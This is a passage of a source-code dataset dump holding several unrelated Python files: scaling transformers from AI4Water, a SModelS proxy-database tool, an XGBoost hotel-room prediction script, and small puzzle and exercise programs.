== 3 and self.feature_dim == \"1d\":\n _x = np.full(x.shape, np.nan)\n for time_step in range(x.shape[1]):\n _x[:, time_step] = self.func(x[:, time_step], axis=0)\n else:\n _x = np.cumsum(x, axis=0)\n\n return _x\n\n def inverse_transform(self, x):\n\n dim = x.ndim\n assert dim == self.data_dim_, f\"dimension of data changed from {self.data_dim_} to {dim}\"\n\n if dim == 3 and self.feature_dim == \"1d\":\n _x = np.full(x.shape, np.nan)\n for time_step in range(x.shape[1]):\n _x[:, time_step] = np.diff(x[:, time_step], axis=0, append=0)\n\n elif 2 <= dim < 4:\n _x = np.diff(x, axis=0, append=0)\n else:\n raise ValueError(f\" dimension {dim} not allowed\")\n\n return _x\n\n\nclass FunctionTransformer(SKFunctionTransformer):\n \"\"\"Serializing a custom func/inverse_func is difficult. 
Therefore\n we expect the func/inverse_func to be either a numpy function or\n the code as a string.\n\n Methods\n -------\n from_config\n\n Attributes\n ----------\n inverse_func_ser\n\n Example\n -------\n >>> array = np.random.randint(1, 100, (20, 2))\n >>> transformer = FunctionTransformer(func=np.log2,\n >>> inverse_func=\"lambda _x: 2**_x\", validate=True)\n >>> t_array = transformer.fit_transform(array)\n >>> transformer.config()\n >>> new_transformer = FunctionTransformer.from_config(transformer.config())\n >>> original_array = new_transformer.inverse_transform(t_array)\n\n \"\"\"\n def __init__(self, func=None, inverse_func=None, validate=False,\n accept_sparse=False, check_inverse=True, kw_args=None,\n inv_kw_args=None):\n\n # if inverse_func is string, we save a serialized version of it in memory\n # to save it in config later.\n self.inverse_func_ser = inverse_func\n\n super().__init__(func=func,\n inverse_func=inverse_func,\n validate=validate,\n accept_sparse=accept_sparse,\n check_inverse=check_inverse,\n kw_args=kw_args,\n inv_kw_args=inv_kw_args)\n\n @property\n def inverse_func(self):\n return self._inverse_func\n\n @inverse_func.setter\n def inverse_func(self, func):\n self._inverse_func = self.deserialize_func(func)\n\n @property\n def inverse_func_ser(self):\n return self._inverse_func_ser\n\n @inverse_func_ser.setter\n def inverse_func_ser(self, func):\n self._inverse_func_ser = self.serialize_func(func)\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the estimator from config file\"\"\"\n\n func = cls.deserialize_func(config.pop('func'))\n\n # do not deserialize inverse_func here, it will be done in init method\n scaler = cls(func=func, inverse_func=config.pop('inverse_func'), **cls.deserialize(**config))\n\n setattr(scaler, '_from_config', True)\n\n return scaler\n\n @staticmethod\n def deserialize_func(func):\n if func is not None:\n if isinstance(func, str):\n if func in np.__dict__:\n func = getattr(np, func)\n else:\n func = eval(func)\n elif isinstance(func, np.ufunc): # np.log2\n func = func\n elif func.__name__ in np.__dict__: # np.diff\n func = func\n else:\n raise ValueError(f\"{func}\")\n\n return func\n\n def config(self) -> dict:\n \"\"\"Returns all the parameters in scaler in a dictionary\"\"\"\n\n params = self.get_params()\n _config = dict()\n _config['func'] = self.serialize_func(self.func)\n _config['inverse_func'] = self.inverse_func_ser\n _config['kw_args'] = jsonize(self.kw_args)\n _config['inv_kw_args'] = jsonize(self.inv_kw_args)\n\n for k, v in params.items():\n if k not in _config:\n _config.update({k: v})\n\n return _config\n\n @staticmethod\n def deserialize(**kwargs):\n _kwargs = {}\n for k, v in kwargs.items():\n if v == \"None\":\n v = None\n _kwargs[k] = v\n\n return _kwargs\n\n @staticmethod\n def serialize_func(func):\n\n if type(func) == np.ufunc:\n func = func.__name__\n\n elif func.__class__.__name__ == \"function\" and func.__module__ == \"numpy\":\n func = func.__name__\n\n elif func is not None:\n if isinstance(func, str):\n func = f\"\"\"{func}\"\"\"\n else:\n raise ValueError(f\"{func} is not serializable\")\n\n return func\n\n\nclass ParetoTransformer(ScalerWithConfig):\n \"\"\"\n Similar to zscore/StandardScaler, but instead of dividing by standard\n deviation, it divides by square root of standard deviation [11]_ and [12]_.\n\n The standard score of a sample `x` is calculated as:\n :: math\n z = (x - u) / sqrt(s)\n\n \"\"\"\n def __init__(\n self,\n feature_dim=\"2d\",\n axis=0\n ):\n self.feature_dim = 
feature_dim\n self.axis = axis\n\n def _reset(self):\n for arg in ['mean_', 'var_', 'scale_', 'data_dim_']:\n setattr(self, arg, None)\n return\n\n def fit(self, X, y=None):\n self._reset()\n self.data_dim_ = np.ndim(X)\n\n self.mean_ = np.nanmean(X, axis=self.axis)\n self.scale_ = np.sqrt(np.nanvar(X, axis=self.axis))\n self.var_ = np.nanvar(X, axis=self.axis)\n\n return self\n\n def transform(self, X, y=None):\n\n assert np.ndim(X) == self.data_dim_\n\n X = X - self.mean_\n\n return X / np.sqrt(self.scale_)\n\n def fit_transform(self, X, y=None):\n return self.fit(X, y=y).transform(X)\n\n def inverse_transform(self, X):\n X = X * np.sqrt(self.scale_)\n return X + self.mean_\n\n @property\n def config_paras(self):\n return ['data_dim_', 'mean_', 'var_', 'scale_']\n\n def get_params(self):\n return {'feature_dim': self.feature_dim, \"axis\": self.axis}\n\n\nclass VastTransformer(ParetoTransformer):\n \"\"\"\n Variable Stability Scaling following the works of Nicholson et al., 2003 [11]_\n and van der Berg et al., 2006 [12]_ .\n\n The standard score of a sample `x` is calculated as:\n :: math\n z = (x - u) / s * u/s\n\n .. [11] https://doi.org/10.1016/S0003-2670(03)00094-1\n .. [12] https://doi.org/10.1186/1471-2164-7-142\n\n \"\"\"\n\n def transform(self, X, y=None):\n\n assert np.ndim(X) == self.data_dim_\n\n X = X - self.mean_\n X = X / self.scale_\n # coefficient of variation\n cv = np.divide(self.mean_ , self.scale_)\n return X * cv\n\n def inverse_transform(self, X, y=None):\n cv = np.divide(self.mean_ , self.scale_)\n X = X / cv\n X = X * self.scale_\n X = X + self.mean_\n return X\n\n\nclass MmadTransformer(ScalerWithConfig):\n \"\"\"\n Median and median absolute deviation following Jain et al., 2005[13]_ and\n Singh and Singh 2020 [14]_.\n\n The standard score of a sample `x` is calculated as:\n :: math\n z = (x - median) / MAD\n\n .. [13] https://doi.org/10.1016/j.patcog.2005.01.012\n .. [14] https://doi.org/10.1016/j.asoc.2019.105524\n \"\"\"\n def __init__(\n self,\n feature_dim=\"1d\",\n axis=0\n ):\n self.feature_dim = feature_dim\n self.axis = axis\n\n def get_params(self):\n return {'feature_dim': self.feature_dim, \"axis\": self.axis}\n\n def _reset(self):\n for arg in ['med_', 'mad_', 'data_dim_']:\n setattr(self, arg, None)\n return\n\n def fit(self, X, y=None):\n \"\"\"fits the data i.e. calculates median and MAD of the data.\n These parameters will be used during transform.\n \"\"\"\n self._reset()\n self.data_dim_ = np.ndim(X)\n self.med_ = np.nanmedian(X, axis=self.axis)\n\n self.mad_ = np.nanmedian(np.absolute(X - self.med_), axis=self.axis)\n\n return self\n\n def transform(self, X, y=None):\n \"\"\"transforms the data i.e. changes the data using the parameters calculated\n during ``fit``.\n \"\"\"\n assert np.ndim(X) == self.data_dim_\n X = X - self.med_\n return X / self.mad_\n\n def fit_transform(self, X, y=None):\n \"\"\"First calls fit and then calls transform.\"\"\"\n return self.fit(X, y=y).transform(X)\n\n def inverse_transform(self, X):\n \"\"\"inverse transforms the X i.e. 
brings the X to original scale by using\n the parameters calculated during ``fit``.\"\"\"\n X = X * self.mad_\n return X + self.med_\n\n @property\n def config_paras(self):\n return ['data_dim_', 'med_', 'mad_']\n\n\ndef closure(mat, out=None):\n mat = np.atleast_2d(mat)\n if out is not None:\n out = np.atleast_2d(out)\n if np.any(mat < 0):\n raise ValueError(\"Cannot have negative proportions\")\n if mat.ndim > 2:\n raise ValueError(\"Input matrix can only have two dimensions or less\")\n norm = mat.sum(axis=1, keepdims=True)\n if np.any(norm == 0):\n raise ValueError(\"Input matrix cannot have rows with all zeros\")\n return np.divide(mat, norm, out=out).squeeze()\n","repo_name":"AtrCheema/AI4Water","sub_path":"ai4water/preprocessing/transformations/_transformations.py","file_name":"_transformations.py","file_ext":"py","file_size_in_byte":29094,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"6007320576","text":"#!/usr/bin/env python3\n\nfrom smodels.tools.databaseClient import DatabaseClient\nfrom smodels.experiment.databaseObj import Database\nimport socket, os, subprocess, copy, time #, tempfile\n\nclass ProxyDBCreater:\n def __init__ ( self, inputfile, rundir, verbose=\"info\" ):\n self.inputfile = inputfile\n self.rundir = rundir\n self.nr = 0\n self.verbstring = verbose\n if type(verbose)==int:\n self.verbose = verbose\n else:\n verbose = verbose.lower()\n verbs = { \"err\": 10, \"warn\": 20, \"info\": 30, \"debug\": 40 }\n self.verbose = 50\n for k,v in verbs.items():\n if k in verbose:\n self.verbose = v\n self.database = Database ( self.inputfile )\n\n def create ( self, servername, serverport ):\n if servername == None:\n servername = socket.gethostname()\n self.pprint ( \"determined servername as '%s'\" % servername )\n if serverport == None:\n serverport = 31770\n self.servername = servername\n self.serverport = serverport\n self.database.client = DatabaseClient ( servername, serverport,\n verbose=self.verbstring, rundir = self.rundir, clientid = self.nr )\n for e,expRes in enumerate(self.database.expResultList):\n for d,dataset in enumerate(expRes.datasets):\n for t,txn in enumerate(dataset.txnameList):\n self.database.expResultList[e].datasets[d].txnameList[t].dbClient = copy.copy ( self.database.client )\n del self.database.expResultList[e].datasets[d].txnameList[t].txnameData.tri\n if txn.txnameDataExp != None:\n del self.database.expResultList[e].datasets[d].txnameList[t].txnameDataExp.tri\n\n def pprint ( self, *args ):\n if self.verbose > 25:\n print ( \"[proxyDBCreater-%s] %s\" % \\\n ( time.strftime(\"%H:%M:%S\"), \" \".join(map(str,args)) ) )\n\n def store ( self, outputfile ):\n \"\"\" store the outputfile \"\"\"\n self.outputfile = outputfile\n self.pprint ( \"writing to %s\" % outputfile )\n if os.path.exists ( outputfile ):\n os.unlink ( outputfile )\n ## first create it as temporary file, then move\n tempf = outputfile + \".tmp\" # tempfile.mktemp ( suffix=\".pcl\" )\n self.database.createBinaryFile ( tempf )\n #cmd = f\"mv {tempf} {outputfile}\"\n #subprocess.getoutput ( cmd )\n os.rename ( tempf, outputfile ) ## would only work on same device\n\n def symlink ( self ):\n \"\"\" set a symlink from self.outputfile to default.pcl \"\"\"\n dirname = os.path.dirname ( self.outputfile )\n symfile = f\"{dirname}/default.pcl\"\n self.pprint ( \"setting a symlink from %s to %s\" % \\\n ( self.outputfile, symfile ) )\n if os.path.exists ( symfile ):\n os.unlink ( symfile )\n cmd = f\"ln -s {self.outputfile} 
{symfile}\"\n subprocess.getoutput ( cmd )\n\n def run ( self, really ):\n \"\"\" now run the server\n :param really: if False, then only write out command\n \"\"\"\n dirname = os.path.dirname ( __file__ )\n inputfile = self.inputfile\n #if not \"/\" in inputfile:\n # inputfile = os.getcwd() + \"/\" + inputfile\n servercmd = \"%s/databaseServer.py -R %s -p %d -d %s -v %s\" % \\\n ( dirname, self.rundir, self.serverport, inputfile, self.verbstring )\n if really:\n self.pprint ( \"starting a server on %s: %s\" % \\\n ( self.servername, servercmd ) )\n import subprocess\n a = subprocess.getoutput ( servercmd )\n self.pprint ( \"output %s\" % a )\n else:\n print ( \"not started a server. you can start one yourself:\" )\n self.pprint ( servercmd )\n\n\ndef main ( args ): ## needed for smodelsTools\n creater = ProxyDBCreater ( args.inputfile, args.rundir, args.verbose )\n creater.create( args.servername, args.serverport )\n creater.store ( args.outputfile )\n if args.symlink:\n creater.symlink()\n creater.run ( args.run )\n\nif __name__ == \"__main__\":\n import sys\n args = \"\"\n for i in sys.argv[1:]:\n if \" \" in i or \",\" in i:\n i = '\"%s\"' % i\n args += i + \" \"\n cmd = \"./smodelsTools.py proxydb %s\" % args \n print ( \"call %s\" % cmd )\n #a = subprocess.getoutput ( cmd )\n #print ( a )\n","repo_name":"SModelS/smodels","sub_path":"smodels/tools/proxyDBCreator.py","file_name":"proxyDBCreator.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"9590519025","text":"def solution(N):\n if N <= 99:\n return N\n \n answer = N\n\n for i in range(100, N+1):\n tmp = list(str(i))\n D = int(tmp[0]) - int(tmp[1])\n for j in range(2, len(tmp)):\n if int(tmp[j - 1]) - int(tmp[j]) != D:\n answer -= 1\n break\n \n return answer\n\nN = int(input())\n\nprint(solution(N))","repo_name":"mieumje/Python_Coding_Test","sub_path":"BOJ/silver/한수.py","file_name":"한수.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28431475399","text":"import json\n\n\ndef transform(input_path, output_path):\n result = {}\n\n with open(input_path) as fp:\n politics_list = json.load(fp)\n\n for each in politics_list:\n result[each[\"name\"]] = each[\"politics\"]\n\n with open(output_path, 'w') as fp:\n fp.write(json.dumps(result, ensure_ascii=False))\n","repo_name":"g0v/2020voting-guide","sub_path":"crawler/bulletin/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"72"} +{"seq_id":"41970517178","text":"import pandas as pd\nimport numpy as np\nimport gc\nimport xgboost as xgb\nfrom sklearn.cross_validation import train_test_split\n#nrows = 10000 #测试代码用\nnrows = None\ntrain_feature1=pd.read_csv('data/train_feature1.csv', nrows=nrows) \n#train_feature1=pd.read_csv('data/train_feature1_7724875_252.csv')\ntrain_related_feature1=pd.read_csv('data/train_related_feature1.csv', nrows=nrows) \ntrain_related_feature1=train_related_feature1.drop(['orderid','roomid'],axis=1)\ntrain_ismaintype=pd.read_csv('data/features6-18/train_ismaintype.csv', nrows=nrows) \ntrain_newFeature=pd.read_csv('data/features6-18/train_newFeatures43.csv', nrows=nrows) \ntrain_feature3=pd.read_csv('data/train_feature_add3.csv', nrows=nrows) \ntrain_feature4=pd.read_csv('data/newfeature-6-22/train_feature_add4_1.csv', nrows=nrows) 
\ntrain_feature5=pd.read_csv('data/newfeature-5/add_train5.csv', nrows=nrows) \n\ntrainset=pd.concat([train_feature1,train_related_feature1,train_ismaintype,train_newFeature,train_feature3,train_feature4,train_feature5],axis=1)\nprint(trainset.shape)\n\ndel train_feature1,train_related_feature1,train_ismaintype,train_newFeature,train_feature3,train_feature4,train_feature5\ngc.collect()\n\ntrainset=trainset[(trainset.orderdate_lastord<=trainset.orderdate)&(trainset.user_avgadvanceddate>=0)]# filter some abnormal data (filters 22037 samples, 688 of which have label 1)\n\n#trainset = trainset.drop\n\nuser=trainset[['uid']].drop_duplicates()\n#print user.shape\n#user,testuser=train_test_split(user,test_size=0.5,random_state=0) # select 50% user for training and testing\ntrainuser,testuser=train_test_split(user,test_size=0.2,random_state=0) # split trainset according to user\n#print trainuser.shape\n#print testuser.shape\n\ntrain=trainset[trainset.uid.isin(trainuser.uid)]\nval=trainset[trainset.uid.isin(testuser.uid)]\n\n#print train.shape\n#print val.shape\n\ndel trainset,trainuser,testuser,user\ngc.collect()\n\ntrain_y=train.orderlabel\ntrain_x=train.drop(['orderid','uid','hotelid','basicroomid','roomid','orderlabel','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\nval_y=val.orderlabel\nval_x=val.drop(['orderid','uid','hotelid','basicroomid','roomid','orderlabel','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\ndel train\ndel val\ngc.collect()\n#print '---------------------------------'\n#print train_x.shape\n#print train_y.shape\n#print val_x.shape\n#print val_y.shape\ncol = train_x.columns # keep the column names so that train/predict feature_names match\ndtrain=xgb.DMatrix(train_x,label=train_y)\ndel train_x,train_y\ngc.collect()\n\ndval=xgb.DMatrix(val_x,label=val_y)\ndel val_x,val_y\ngc.collect()\n\nparams={'booster':'gbtree',\n\t 'objective': 'binary:logistic',\n\t 'eval_metric':'auc',\n\t 'gamma':0.05,\n\t 'min_child_weight':0.7,\n\t 'max_depth':6,\n\t 'lambda':1,\n\t 'subsample':0.7,\n\t 'colsample_bytree':0.7,\n\t 'colsample_bylevel':0.7,\n\t 'eta': 0.03,\n\t 'tree_method':'exact',\n\t 'seed':0,\n\t 'nthread':35\n\t }\n\n#train on trainset1, evaluate on trainset2\nwatchlist = [(dtrain,'train'),(dval,'val')]\nmodel = xgb.train(params,dtrain,num_boost_round=8000,evals=watchlist,early_stopping_rounds=200)\n#model = xgb.cv(params,dtrain,num_boost_round=5000,nfold=5,metrics='auc',early_stopping_rounds=200,show_stdv=3)\n\n# save feature score\nmodel.save_model('xgb_8000.model')\n\ndel dtrain,dval\ngc.collect()\n
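# xgb.train with early_stopping_rounds keeps the best round on the watchlist; a minimal (hypothetical) sketch of using it at prediction time with this xgboost-era API, e.g.:\n# preds = model.predict(some_dmatrix, ntree_limit=model.best_ntree_limit)  # some_dmatrix: any xgb.DMatrix built with columns [col]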
\n#==============================================================================\n# feature_score8000=model.get_fscore()\n# feature_score8000=sorted(feature_score8000.items(),key=lambda x:x[1],reverse=True)\n# fs=[]\n# for (key,value) in feature_score8000:\n# \tfs.append('{0},{1}\\n'.format(key,value))\n# with open('feature_score8000.csv','w') as f:\n# \tf.writelines('feature,score\\n')\n# \tf.writelines(fs)\n#==============================================================================\n\n\ntest_feature1=pd.read_csv('data/test_feature1.csv', nrows=nrows) \n#test_feature1=pd.read_csv('data/test_feature1_7448647_251.csv')\ntest_related_feature1=pd.read_csv('data/test_related_feature1.csv', nrows=nrows) \ntest_related_feature1=test_related_feature1.drop(['orderid','roomid'],axis=1)\ntest_ismaintype=pd.read_csv('data/features6-18/test_ismaintype.csv', nrows=nrows) \ntest_newFeature=pd.read_csv('data/features6-18/test_newFeatures43.csv', nrows=nrows) \ntest_feature3=pd.read_csv('data/test_feature_add3.csv', nrows=nrows) \ntest_feature4=pd.read_csv('data/newfeature-6-22/test_feature_add4_1.csv', nrows=nrows) \ntest_feature5=pd.read_csv('data/newfeature-5/add_test5.csv', nrows=nrows) \n\nreader=pd.concat([test_feature1,test_related_feature1,test_ismaintype,test_newFeature,test_feature3,test_feature4,test_feature5],axis=1)\nprint(reader.shape)\n\n#reader=xgb.DMatrix(reader)\n\ndel test_feature1,test_related_feature1,test_ismaintype,test_newFeature,test_feature3,test_feature4,test_feature5\ngc.collect()\n\n#reader=pd.read_csv('data/testset.csv',chunksize=200000)\nflag=0\ntestset_preds=[]\nfor i in range(38):\n\ttestset=reader[i*200000:(i+1)*200000]\n\tif flag==0:\n\t\ttestset_preds1=testset[['orderid','roomid']]\n\t\ttestset_x=testset.drop(['orderid','uid','hotelid','basicroomid','roomid','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\n\t\ttestset_x=xgb.DMatrix(testset_x[col]) # reindex by colname so that train/predict feature_names match\n\t\ttestset_preds1['label'] = model.predict(testset_x)\n\t\ttestset_preds=testset_preds1\n\t\tflag=1\n\telse:\n\t\ttestset_preds1=testset[['orderid','roomid']]\n\t\ttestset_x=testset.drop(['orderid','uid','hotelid','basicroomid','roomid','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\n\t\ttestset_x=xgb.DMatrix(testset_x[col])\n\t\ttestset_preds1['label'] = model.predict(testset_x)\n\t\ttestset_preds=pd.concat([testset_preds,testset_preds1],axis=0)\ndel reader\ngc.collect()\ntestset_preds.sort_values(by=['orderid','label'],inplace=True)\ntestset_preds['ranks']=testset_preds.groupby('orderid')['label'].rank(ascending=False)\ntestset_preds.to_csv('fusion_data/full_xgb_submission.csv',index=None)\ntestset_preds=testset_preds[testset_preds.ranks==1]\ntestset_preds[['orderid','roomid']].rename(columns={'roomid':'predict_roomid'}).to_csv('xgb_submission.csv',index=None)\n#print testset_preds.shape","repo_name":"qiaoguan/Kesci-ctrip-room-prediction","sub_path":"train_xgb.py","file_name":"train_xgb.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} {"seq_id":"40830653802","text":"from types.user import User\nfrom types.user_mapping import UserMapping\nfrom types.user_group import UserGroup\nfrom types.user_record import UserRecord\nfrom user_groups import UserGroups\nfrom bson.objectid import ObjectId\n\nUSERS_CATEGORY_NAME = 'users'\n\n#----------------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------------\nclass Users():\n def __init__(self, instance):\n self.instance = instance\n\n#----------------------------------------------------------------------------------------------\n def init(self):\n self.cat = self.instance.connection.db[USERS_CATEGORY_NAME]\n\n#----------------------------------------------------------------------------------------------\n def addUser(self, user_spec, group, rights):\n '''add new user. 
if group_id = None create new user group with user admin rights \n otherwise group_id and rights should be set\n @return boolean value True if success otherwise False'''\n \n UNIQUE_FIELD_NAME = 'email'\n \n out = False\n if not self.get_user_by_name(user_spec[UNIQUE_FIELD_NAME]):\n if group:\n group = self.instance.user_groups.get_user_group(group._id)\n if group:\n user_id = str(ObjectId())\n \n user_spec['_id'] = user_id\n user_spec['group_id'] = group._id\n \n new_user = User(user_spec)\n self.cat.insert(new_user.get())\n \n group.addUserRecord(new_user._id, rights)\n \n self.instance.user_settings.createUserSettings(new_user)\n self.instance.user_groups.update_user_group(group)\n \n out = True\n else:\n print('[Users::addUser] failed get group %s'%str(group_id))\n else: # no specified group_id, create group and assign user to it\n \n new_group = self.instance.user_groups.createUserGroup()\n \n user_spec['_id'] = str(ObjectId())\n user_spec['group_id'] = new_group._id\n \n new_user = User(user_spec) # TODO check spec valid?\n \n self.instance.user_settings.createUserSettings(new_user)\n self.instance.user_groups.moveUser(new_user, new_group, rights)\n \n self.cat.insert(new_user.get())\n out = True\n else:\n print('[Users::addUser] user {} already exist'.format(user_spec['email']))\n \n return out\n\n#----------------------------------------------------------------------------------------------\n def removeUserById(self, user_id):\n out = False\n user = self.getUserById(user_id)\n if user:\n out = self.removeUser(user)\n return out\n \n#----------------------------------------------------------------------------------------------\n def removeUser(self, user_object, clear_all_if_empty_group = False):\n ''' removes user by id. cause modifying user group and remove it if necessary'''\n out = False\n \n user = self.getUserById(user_object._id)\n if user:\n group = self.instance.user_groups.get_user_group(user.group_id)\n if group:\n self.instance.user_groups.removeUserFromGroup(user, group)\n \n user_settings = self.instance.user_settings.getUserSettings(user._id)\n if user_settings:\n self.instance.user_settings.removeUserSettings(user_settings)\n else:\n print('failed to remove user settings')\n \n if group.usersNum() == 0 and clear_all_if_empty_group:\n self.instance.user_groups.removeGroup(group)\n else:\n self.instance.user_groups.update_user_group(group)\n \n self.cat.remove({\"_id\": user._id})\n out = True\n else:\n print('[Users::removeUser] invalid group')\n else:\n print(\"[Users::remove_user] user {} does'nt exist\".format(id))\n return out\n\n#----------------------------------------------------------------------------------------------\n def modify_user(self, id, spec):\n pass\n\n#----------------------------------------------------------------------------------------------\n def getUserById(self, _id):\n data = self.cat.find_one({'_id':_id})\n if data:\n return User(data)\n return None\n\n#----------------------------------------------------------------------------------------------\n def get_user_by_name(self, login):\n data = self.cat.find_one({'email':login})\n if data:\n return User(data)\n return None\n\n#----------------------------------------------------------------------------------------------\n def drop(self):\n '''drop collection. 
rem in production'''\n self.cat.drop()","repo_name":"innovatelogic/shop7","sub_path":"src/common/db/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74618753833","text":"import sys\n\n\nclass Tree:\n __nodes = []\n __path = []\n __value = \"\"\n __side = 0\n\n def __init__(self, val):\n self.__value = val\n self.__side = len(val) ** .5\n print(\"init\")\n #self.__path.append(val)\n #print(self.__path)\n#ISSUE\n def add_node(self, node):\n self.__nodes.append(node)\n node.__path = []\n for i in range(0, len(self.__path)):\n node.__path.append(self.__path[i])\n node.__path.append(node.__value)\n print(\"addnode\")\n\n def get_path(self):\n print(\"getpath\")\n return self.__path\n\n def get_nodes(self):\n print(\"getnodes\")\n return self.__nodes\n\n def get_val(self):\n print(\"getval\")\n return self.__value\n\n def is_correct(self):\n print(\"iscorrect\")\n if self.__value == \"12345678_\":\n return True\n else: return False\n\n def is_incorrect(self):\n print(\"isincorrect\")\n if self.__value == \"12345687_\":\n return True\n else: return False\n\n def move(self):\n print(\"move\")\n if self.is_correct():\n # print(\"correct\")\n return self.__path\n if self.is_incorrect():\n # print(\"incorrect\")\n return self.__path\n index = self.__value.index(\"_\")\n if index == 0:\n self.moveleft(0)\n self.moveup(0)\n elif index == 1:\n self.moveup(1)\n self.moveright(1)\n self.moveleft(1)\n elif index == 2:\n self.moveup(2)\n self.moveright(2)\n elif index == 3:\n self.moveleft(3)\n self.movedown(3)\n self.moveup(3)\n elif index == 4:\n self.moveright(4)\n self.moveleft(4)\n self.moveup(4)\n self.movedown(4)\n elif index == 5:\n self.moveright(5)\n self.movedown(5)\n self.moveup(5)\n elif index == 6:\n self.moveleft(6)\n self.movedown(6)\n elif index == 7:\n self.movedown(7)\n self.moveleft(7)\n self.moveright(7)\n elif index == 8:\n self.moveright(8)\n self.movedown(8)\n # hardcoded corners\n #if index == 0:\n # self.moveleft(index)\n # self.moveup(index)\n #if index == self.__side - 1:\n # self.moveright(index)\n # self.moveup(index)\n #if index == len(self.__value)-1:\n # self.moveright(index)\n # self.movedown(index)\n #if index == len(self.__value)-self.__side:\n # self.moveleft(index)\n # self.movedown(index)\n # edges\n #elif index % 3 == 0:\n # self.moveup(index)\n # self.movedown(index)\n # self.moveleft(index)\n # elif index % 3 == self.__side - 1:\n # self.moveup(index)\n # self.movedown(index)\n # self.moveright(index)\n # # centers\n # else:\n # self.moveright(index)\n # self.moveleft(index)\n # self.moveup(index)\n # self.movedown(index)\n # print(\"other\")\n return []\n # recur no recurring nvm\n\n def swap(self, index1, index2):\n print(\"swap\")\n t = list(self.__value)\n t[index1], t[index2] = t[index2], t[index1]\n self.__value = ''.join(t)\n\n def moveleft(self, gapindex):\n print(\"moveleft\")\n st1 = self.__value\n #st[gapindex], st[gapindex+1] = st[gapindex+1], st[gapindex]\n t1 = list(st1)\n t1[int(gapindex)], t1[int(gapindex + 1)] = t1[int(gapindex + 1)], t1[int(gapindex)]\n self.add_node(Tree(''.join(t1)))\n\n def moveright(self, gapindex):\n print(\"moveright\")\n st2 = self.__value\n #st[gapindex], st[gapindex-1] = st[gapindex-1], st[gapindex]\n t2 = list(st2)\n t2[int(gapindex)], t2[int(gapindex - 1)] = t2[int(gapindex - 1)], t2[int(gapindex)]\n self.add_node(Tree(''.join(t2)))\n\n def moveup(self, gapindex):\n print(\"moveup\")\n 
st3 = self.__value\n t3 = list(st3)\n #st[int(gapindex)], st[int(gapindex)+int(self.__side)] = st[int(gapindex)+int(self.__side)], st[int(gapindex)]\n t3[int(gapindex)], t3[int(gapindex+self.__side)] = t3[int(gapindex+self.__side)], t3[int(gapindex)]\n self.add_node(Tree(''.join(t3)))\n\n def movedown(self, gapindex):\n print(\"movedown\")\n st4 = self.__value\n t4 = list(st4)\n #st[gapindex], st[gapindex-self.__side] = st[gapindex-self.__side], st[gapindex]\n t4[int(gapindex)], t4[int(gapindex-self.__side)] = t4[int(gapindex-self.__side)], t4[int(gapindex)]\n self.add_node(Tree(''.join(t4)))\n\ninp = sys.argv[1]\nif(len(inp)==8):\n inp = (inp, \"_\")\nelif(len(inp)<8):\n inp = (inp, \"_\", sys.argv[2])\ninp = ''.join(inp)\n#print(inp)\ntree = Tree(inp)\n\n\narr = [tree]\n#popped = arr.pop(0)\nwhile len(arr[0].move()) == 0: #len(popped.move()) == 0:\n #print(popped.get_path())\n print(arr[0].get_path())\n for i in range(0, len(arr[0].get_nodes())): #range(0, len(popped.get_nodes())):\n print(\"1\")\n arr.append(arr[0].get_nodes()[i]) #arr.append(popped.get_nodes()[i])\n print(\"2\")\n arr.pop(0)\n #popped = arr.pop(0)\n#print(len(popped.move()))\n#print(len([]))\n#print(popped.move())\n#print(popped.get_path())\nprint(arr[0].get_path())","repo_name":"ericktian/8game","sub_path":"8gameefficient.py","file_name":"8gameefficient.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"3338560815","text":"#!/usr/bin/python3\n\"\"\"Defining class square\"\"\"\n\n\nclass Square:\n \"\"\"Representing a square\"\"\"\n\n def __init__(self, size=0):\n \"\"\"Initializing square\"\"\"\n self.size = size\n\n @property\n def size(self):\n \"\"\"Getter of __size\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"Setter of __size\"\"\"\n if type(value) is not int:\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n\n def area(self):\n \"\"\"Computes the area of the square\"\"\"\n return self.size ** 2\n\n def my_print(self):\n \"\"\"prints in stdout the square with the character #\"\"\"\n from sys import stdout as out\n if self.__size == 0:\n print(\"\", file=out)\n return\n for i in range(self.__size):\n for j in range(self.__size):\n print(\"#\", end=\"\", file=out)\n print(\"\")\n","repo_name":"JuanSebastianGB/holbertonschool-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"39806675612","text":"'''\nWrite a program that implements the formula:\nA = P * R * T\n'''\n\nprincipal = float(input('Enter principal amount: '))  # input() returns str; cast before arithmetic\nrate = float(input('Enter rate(in percentage): '))\ntime = float(input('Enter time given(years): '))\n\n\namount = principal * rate/100 * time\n\nprint ('The amount accumulated after {} years is {}'.format(time, amount) )","repo_name":"stellakaniaru/practice_solutions","sub_path":"get_amount.py","file_name":"get_amount.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"16918210749","text":"# the teacher's version 